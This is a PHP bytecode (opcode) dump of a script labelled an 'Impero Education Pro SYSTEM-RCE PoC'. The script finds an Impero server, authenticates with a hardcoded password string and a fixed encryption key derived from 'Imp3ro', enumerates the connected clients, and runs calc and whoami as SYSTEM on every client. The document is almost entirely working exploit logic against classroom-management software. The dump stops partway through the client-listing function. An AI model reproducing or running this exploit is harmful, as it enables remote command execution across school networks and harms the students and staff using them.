Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 43) Position 1 = 4, Position 2 = 15
Branch analysis from position: 4
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 15
2 jumps found. (Code = 77) Position 1 = 19, Position 2 = 71
Branch analysis from position: 19
2 jumps found. (Code = 78) Position 1 = 20, Position 2 = 71
Branch analysis from position: 20
2 jumps found. (Code = 43) Position 1 = 24, Position 2 = 46
Branch analysis from position: 24
2 jumps found. (Code = 43) Position 1 = 28, Position 2 = 29
Branch analysis from position: 28
1 jumps found. (Code = 42) Position 1 = 19
Branch analysis from position: 19
Branch analysis from position: 29
2 jumps found. (Code = 43) Position 1 = 41, Position 2 = 42
Branch analysis from position: 41
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 42
2 jumps found. (Code = 43) Position 1 = 52, Position 2 = 53
Branch analysis from position: 52
1 jumps found. (Code = 42) Position 1 = 19
Branch analysis from position: 19
Branch analysis from position: 53
2 jumps found. (Code = 43) Position 1 = 69, Position 2 = 70
Branch analysis from position: 69
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 70
1 jumps found. (Code = 42) Position 1 = 19
Branch analysis from position: 19
Branch analysis from position: 46
Branch analysis from position: 71
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 71
filename: /in/f2jt8
function name: (null)
number of ops: 73
compiled vars: !0 = $socketid, !1 = $argc, !2 = $argv, !3 = $arg, !4 = $key, !5 = $detected, !6 = $h, !7 = $clients
line #* E I O op fetch ext return operands
-------------------------------------------------------------------------------------
141 0 E > ASSIGN !0, -1
142 1 ECHO '%5B%2A%5D+Impero+Education+Pro+SYSTEM-RCE+PoC+by+slipstream%2FRoL%5ELHQ%0A'
143 2 IS_SMALLER !1, 2
3 > JMPZ ~9, ->15
144 4 > FETCH_DIM_R ~10 !2, 0
5 CONCAT ~11 '%5B-%5D+Usage%3A+', ~10
6 CONCAT ~12 ~11, '+%3CserverIPs+space-delimited%3E%0A'
7 ECHO ~12
145 8 ECHO '%5B%2A%5D+If+you+pass+%22detect+%3Cif%3E+%3Cbroadcastmask%3E%22+%28without+quotes%29+as+serverIP+then+we+will+try+to+find+an+impero+server%2C+using+interface+and+broadcast+mask+given.%0A'
146 9 FETCH_DIM_R ~13 !2, 0
10 CONCAT ~14 '%5B%2A%5D+Example+of+this%3A+', ~13
11 CONCAT ~15 ~14, '+detect+vboxnet0+192.168.56.255%0A'
12 ECHO ~15
147 13 ECHO '%5B%2A%5D+This+PoC+will+pop+a+calc+and+run+whoami+%3E+C%3A%5Clol.txt+as+SYSTEM+on+%2Aevery+connected+client%2A%21%0A'
148 14 > EXIT
150 15 > INIT_FCALL 'array_shift'
16 SEND_REF !2
17 DO_ICALL
151 18 > FE_RESET_R $17 !2, ->71
19 > > FE_FETCH_R ~18 $17, !3, ->71
20 > ASSIGN !4, ~18
152 21 ASSIGN !5, <false>
153 22 IS_EQUAL !3, 'detect'
23 > JMPZ ~21, ->46
154 24 > ADD ~22 !4, 2
25 COUNT ~23 !2
26 IS_SMALLER_OR_EQUAL ~23, ~22
27 > JMPZ ~24, ->29
28 > > JMP ->19
155 29 > ECHO '%5B%2A%5D+Finding+Impero+server...%0A'
156 30 INIT_FCALL 'findimperoserver'
31 ADD ~25 !4, 1
32 FETCH_DIM_R ~26 !2, ~25
33 SEND_VAL ~26
34 ADD ~27 !4, 2
35 FETCH_DIM_R ~28 !2, ~27
36 SEND_VAL ~28
37 DO_FCALL 0 $29
38 ASSIGN !3, $29
157 39 BOOL_NOT ~31 !3
40 > JMPZ ~31, ->42
41 > > EXIT '%5B-%5D+Cannot+find+Impero+server%0A'
158 42 > CONCAT ~32 '%5B%2B%5D+Found+Impero+server+at+', !3
43 CONCAT ~33 ~32, '%0A'
44 ECHO ~33
159 45 ASSIGN !5, <true>
161 46 > INIT_FCALL 'connect'
47 SEND_VAR !3
48 DO_FCALL 0 $35
49 ASSIGN !6, $35
162 50 TYPE_CHECK 4 !6
51 > JMPZ ~37, ->53
52 > > JMP ->19
163 53 > INIT_FCALL 'getallclients'
54 SEND_VAR !6
55 DO_FCALL 0 $38
56 ASSIGN !7, $38
164 57 INIT_FCALL 'runexeassystem'
58 SEND_VAR !6
59 SEND_VAR !7
60 SEND_VAL 'calc'
61 DO_FCALL 0
165 62 INIT_FCALL 'runcmd'
63 SEND_VAR !6
64 SEND_VAR !7
65 SEND_VAL 'whoami+%3E+C%3A%5Clol.txt'
66 DO_FCALL 0
166 67 ECHO '%0A'
167 68 > JMPZ !5, ->70
69 > > EXIT
151 70 > > JMP ->19
71 > FE_FREE $17
168 72 > RETURN 1
Function padstring:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 42) Position 1 = 18
Branch analysis from position: 18
2 jumps found. (Code = 44) Position 1 = 20, Position 2 = 9
Branch analysis from position: 20
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 9
2 jumps found. (Code = 44) Position 1 = 20, Position 2 = 9
Branch analysis from position: 20
Branch analysis from position: 9
filename: /in/f2jt8
function name: PadString
number of ops: 27
compiled vars: !0 = $str, !1 = $size, !2 = $pad, !3 = $padstr, !4 = $i
line #* E I O op fetch ext return operands
-------------------------------------------------------------------------------------
6 0 E > RECV !0
7 1 ASSIGN !1, 16
8 2 STRLEN ~6 !0
3 MOD ~7 ~6, !1
4 SUB ~8 !1, ~7
5 ASSIGN !2, ~8
9 6 ASSIGN !3, ''
10 7 ASSIGN !4, 1
8 > JMP ->18
11 9 > INIT_FCALL 'chr'
10 INIT_FCALL 'mt_rand'
11 SEND_VAL 0
12 SEND_VAL 255
13 DO_ICALL $12
14 SEND_VAR $12
15 DO_ICALL $13
16 ASSIGN_OP 8 !3, $13
10 17 PRE_INC !4
18 > IS_SMALLER !4, !2
19 > JMPNZ ~16, ->9
12 20 > CONCAT ~17 !0, !3
21 INIT_FCALL 'chr'
22 SEND_VAR !2
23 DO_ICALL $18
24 CONCAT ~19 ~17, $18
25 > RETURN ~19
13 26* > RETURN null
End of function padstring
Function unpadstring:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename: /in/f2jt8
function name: UnPadString
number of ops: 16
compiled vars: !0 = $str
line #* E I O op fetch ext return operands
-------------------------------------------------------------------------------------
15 0 E > RECV !0
16 1 INIT_FCALL 'substr'
2 SEND_VAR !0
3 SEND_VAL 0
4 INIT_FCALL 'ord'
5 INIT_FCALL 'substr'
6 SEND_VAR !0
7 SEND_VAL -1
8 DO_ICALL $1
9 SEND_VAR $1
10 DO_ICALL $2
11 MUL ~3 $2, -1
12 SEND_VAL ~3
13 DO_ICALL $4
14 > RETURN $4
17 15* > RETURN null
End of function unpadstring
Function cryptstring:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename: /in/f2jt8
function name: CryptString
number of ops: 33
compiled vars: !0 = $str, !1 = $hash, !2 = $key, !3 = $iv, !4 = $crypted
line #* E I O op fetch ext return operands
-------------------------------------------------------------------------------------
19 0 E > RECV !0
20 1 INIT_FCALL 'hash'
2 SEND_VAL 'sha512'
3 SEND_VAL 'Imp3ro'
4 SEND_VAL <true>
5 DO_ICALL $5
6 ASSIGN !1, $5
21 7 INIT_FCALL 'substr'
8 SEND_VAR !1
9 SEND_VAL 0
10 SEND_VAL 32
11 DO_ICALL $7
12 ASSIGN !2, $7
22 13 INIT_FCALL 'substr'
14 SEND_VAR !1
15 SEND_VAL 32
16 SEND_VAL 16
17 DO_ICALL $9
18 ASSIGN !3, $9
23 19 INIT_FCALL_BY_NAME 'mcrypt_encrypt'
20 FETCH_CONSTANT ~11 'MCRYPT_RIJNDAEL_128'
21 SEND_VAL_EX ~11
22 SEND_VAR_EX !2
23 INIT_FCALL 'padstring'
24 SEND_VAR !0
25 DO_FCALL 0 $12
26 SEND_VAR_NO_REF_EX $12
27 SEND_VAL_EX 'cbc'
28 SEND_VAR_EX !3
29 DO_FCALL 0 $13
30 ASSIGN !4, $13
24 31 > RETURN !4
25 32* > RETURN null
End of function cryptstring
Function decryptstring:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename: /in/f2jt8
function name: DecryptString
number of ops: 32
compiled vars: !0 = $str, !1 = $hash, !2 = $key, !3 = $iv
line #* E I O op fetch ext return operands
-------------------------------------------------------------------------------------
27 0 E > RECV !0
28 1 INIT_FCALL 'hash'
2 SEND_VAL 'sha512'
3 SEND_VAL 'Imp3ro'
4 SEND_VAL <true>
5 DO_ICALL $4
6 ASSIGN !1, $4
29 7 INIT_FCALL 'substr'
8 SEND_VAR !1
9 SEND_VAL 0
10 SEND_VAL 32
11 DO_ICALL $6
12 ASSIGN !2, $6
30 13 INIT_FCALL 'substr'
14 SEND_VAR !1
15 SEND_VAL 32
16 SEND_VAL 16
17 DO_ICALL $8
18 ASSIGN !3, $8
31 19 INIT_FCALL 'unpadstring'
20 INIT_FCALL_BY_NAME 'mcrypt_decrypt'
21 FETCH_CONSTANT ~10 'MCRYPT_RIJNDAEL_128'
22 SEND_VAL_EX ~10
23 SEND_VAR_EX !2
24 SEND_VAR_EX !0
25 SEND_VAL_EX 'cbc'
26 SEND_VAR_EX !3
27 DO_FCALL 0 $11
28 SEND_VAR $11
29 DO_FCALL 0 $12
30 > RETURN $12
32 31* > RETURN null
End of function decryptstring
Function sendnetwork:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename: /in/f2jt8
function name: SendNetwork
number of ops: 18
compiled vars: !0 = $h, !1 = $str, !2 = $socketid, !3 = $crypted
line #* E I O op fetch ext return operands
-------------------------------------------------------------------------------------
34 0 E > RECV !0
1 RECV !1
35 2 BIND_GLOBAL !2, 'socketid'
36 3 INIT_FCALL 'cryptstring'
4 CONCAT ~4 !2, '%7C'
5 CONCAT ~5 ~4, !1
6 SEND_VAL ~5
7 DO_FCALL 0 $6
8 ASSIGN !3, $6
37 9 INIT_FCALL_BY_NAME 'socket_write'
10 SEND_VAR_EX !0
11 STRLEN ~8 !3
12 CONCAT ~9 ~8, '%7C'
13 CONCAT ~10 ~9, !3
14 SEND_VAL_EX ~10
15 DO_FCALL 0
38 16 > RETURN null
39 17* > RETURN null
End of function sendnetwork
Function recvnetwork:
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 44) Position 1 = 11, Position 2 = 3
Branch analysis from position: 11
2 jumps found. (Code = 43) Position 1 = 15, Position 2 = 16
Branch analysis from position: 15
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 16
2 jumps found. (Code = 43) Position 1 = 37, Position 2 = 39
Branch analysis from position: 37
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 39
Branch analysis from position: 3
filename: /in/f2jt8
function name: RecvNetwork
number of ops: 42
compiled vars: !0 = $h, !1 = $len, !2 = $chr, !3 = $crypted, !4 = $dec, !5 = $socketid
line #* E I O op fetch ext return operands
-------------------------------------------------------------------------------------
41 0 E > RECV !0
42 1 ASSIGN !1, ''
43 2 ASSIGN !2, ''
45 3 > ASSIGN_OP 8 !1, !2
46 4 INIT_FCALL_BY_NAME 'socket_read'
5 SEND_VAR_EX !0
6 SEND_VAL_EX 1
7 DO_FCALL 0 $9
8 ASSIGN !2, $9
47 9 IS_NOT_EQUAL !2, '%7C'
10 > JMPNZ ~11, ->3
48 11 > CAST 4 ~12 !1
12 ASSIGN !1, ~12
49 13 IS_SMALLER !1, 1
14 > JMPZ ~14, ->16
15 > > EXIT 'Something%27s+wrong.+Length+isn%27t+an+int.'
50 16 > INIT_FCALL_BY_NAME 'socket_set_block'
17 SEND_VAR_EX !0
18 DO_FCALL 0
51 19 INIT_FCALL_BY_NAME 'socket_read'
20 SEND_VAR_EX !0
21 SEND_VAR_EX !1
22 DO_FCALL 0 $16
23 ASSIGN !3, $16
52 24 INIT_FCALL 'decryptstring'
25 SEND_VAR !3
26 DO_FCALL 0 $18
27 ASSIGN !4, $18
53 28 BIND_GLOBAL !5, 'socketid'
54 29 INIT_FCALL 'explode'
30 SEND_VAL '%7C'
31 SEND_VAR !4
32 SEND_VAL 2
33 DO_ICALL $20
34 ASSIGN !4, $20
55 35 IS_EQUAL !5, -1
36 > JMPZ ~22, ->39
37 > FETCH_DIM_R ~23 !4, 0
38 ASSIGN !5, ~23
56 39 > FETCH_DIM_R ~25 !4, 1
40 > RETURN ~25
57 41* > RETURN null
End of function recvnetwork
Function connect:
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 47) Position 1 = 17, Position 2 = 24
Branch analysis from position: 17
2 jumps found. (Code = 43) Position 1 = 25, Position 2 = 27
Branch analysis from position: 25
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 27
2 jumps found. (Code = 43) Position 1 = 39, Position 2 = 41
Branch analysis from position: 39
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 41
1 jumps found. (Code = 42) Position 1 = 55
Branch analysis from position: 55
2 jumps found. (Code = 44) Position 1 = 57, Position 2 = 48
Branch analysis from position: 57
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 48
2 jumps found. (Code = 44) Position 1 = 57, Position 2 = 48
Branch analysis from position: 57
Branch analysis from position: 48
Branch analysis from position: 24
filename: /in/f2jt8
function name: Connect
number of ops: 60
compiled vars: !0 = $host, !1 = $port, !2 = $h, !3 = $data, !4 = $i
line #* E I O op fetch ext return operands
-------------------------------------------------------------------------------------
59 0 E > RECV !0
1 RECV_INIT !1 30015
60 2 ECHO 'Connecting...'
61 3 INIT_FCALL_BY_NAME 'socket_create'
4 FETCH_CONSTANT ~5 'AF_INET'
5 SEND_VAL_EX ~5
6 FETCH_CONSTANT ~6 'SOCK_STREAM'
7 SEND_VAL_EX ~6
8 FETCH_CONSTANT ~7 'SOL_TCP'
9 SEND_VAL_EX ~7
10 DO_FCALL 0 $8
11 ASSIGN !2, $8
62 12 INIT_FCALL_BY_NAME 'socket_set_block'
13 SEND_VAR_EX !2
14 DO_FCALL 0
63 15 BOOL_NOT ~11 !2
16 > JMPNZ_EX ~11 ~11, ->24
17 > INIT_FCALL_BY_NAME 'socket_connect'
18 SEND_VAR_EX !2
19 SEND_VAR_EX !0
20 SEND_VAR_EX !1
21 DO_FCALL 0 $12
22 BOOL_NOT ~13 $12
23 BOOL ~11 ~13
24 > > JMPZ ~11, ->27
64 25 > ECHO 'failed.%0A'
65 26 > RETURN <false>
67 27 > ECHO 'done%21%0AAuthenticating...'
69 28 INIT_FCALL 'sendnetwork'
29 SEND_VAR !2
30 SEND_VAL 'AUTHENTICATE%02PASSWORD'
31 DO_FCALL 0
70 32 ECHO 'done%21%0AWaiting+for+response...'
72 33 INIT_FCALL 'recvnetwork'
34 SEND_VAR !2
35 DO_FCALL 0 $15
36 ASSIGN !3, $15
73 37 IS_NOT_EQUAL !3, 'AUTH%3AOK'
38 > JMPZ ~17, ->41
74 39 > ECHO 'authentication+failed.%0A'
75 40 > RETURN <false>
77 41 > ECHO 'authentication+succeeded%21%0ANegotiating...'
78 42 INIT_FCALL 'sendnetwork'
43 SEND_VAR !2
44 SEND_VAL 'PING1%02IE11WIN7%03%035003%019f579e0f20cb18c8bc1ee4f2dc5d9aeb%01c0d3fd41a05add5e6d7c8b64924bef86%018dc3a6ceec8a51e1fd2e7e688db44417%01d1554e349fc677e6011309683ac1b85b%012b94f70093e484b8fc7f62a4670377ea'
45 DO_FCALL 0
80 46 ASSIGN !4, 0
47 > JMP ->55
81 48 > INIT_FCALL 'recvnetwork'
49 SEND_VAR !2
50 DO_FCALL 0
82 51 INIT_FCALL 'usleep'
52 SEND_VAL 500000
53 DO_ICALL
80 54 PRE_INC !4
55 > IS_SMALLER !4, 4
56 > JMPNZ ~23, ->48
85 57 > ECHO 'done%21%0A'
86 58 > RETURN !2
87 59* > RETURN null
End of function connect
Function getallclients:
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 77) Position 1 = 32, Position 2 = 43
Branch analysis from position: 32
2 jumps found. (Code = 78) Position 1 = 33, Position 2 = 43
Branch analysis from position: 33
1 jumps found. (Code = 42) Position 1 = 32
Branch analysis from position: 32
Branch analysis from position: 43
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 43
filename: /in/f2jt8
function name: GetAllClients
number of ops: Generated using Vulcan Logic Dumper, using php 8.0.0